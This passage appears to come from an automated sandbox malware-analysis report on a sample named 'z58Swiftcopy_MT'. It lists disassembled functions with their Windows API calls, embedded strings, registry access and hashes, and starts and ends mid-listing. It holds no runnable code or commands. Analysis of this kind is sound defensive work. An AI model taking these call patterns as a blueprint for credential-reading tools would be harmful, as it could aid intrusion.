                                                                                                                                                                                                                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                                      Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                                      • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                                                      Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                                      • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                                                                                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                                                      Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintfwcscat
                                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                                      • API String ID: 384018552-4153097237
                                                                                                                                                                                                                                      • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                                                                                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                                                      Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                                      • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                                      • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                                                                                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                                                      Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                                      • String ID: 6$\
                                                                                                                                                                                                                                      • API String ID: 404372293-1284684873
                                                                                                                                                                                                                                      • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                                                                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                                                      Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1331804452-0
                                                                                                                                                                                                                                      • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                                                                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                                                      Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 2012295524-4050573280
                                                                                                                                                                                                                                      • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                                                      Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                                      • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                                      • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                                      • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                                                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                                      Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                                      • API String ID: 2521778956-791839006
                                                                                                                                                                                                                                      • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                                                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                                                      Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                                      • API String ID: 999028693-502967061
                                                                                                                                                                                                                                      • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                                                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                                                      Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                                                                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2350177629-0
                                                                                                                                                                                                                                      • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                                                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                                      Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                                      • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                                      • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                                                                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                                                      Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00409042
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                                                                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 265355444-0
                                                                                                                                                                                                                                      • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                                                                                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                                                      Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
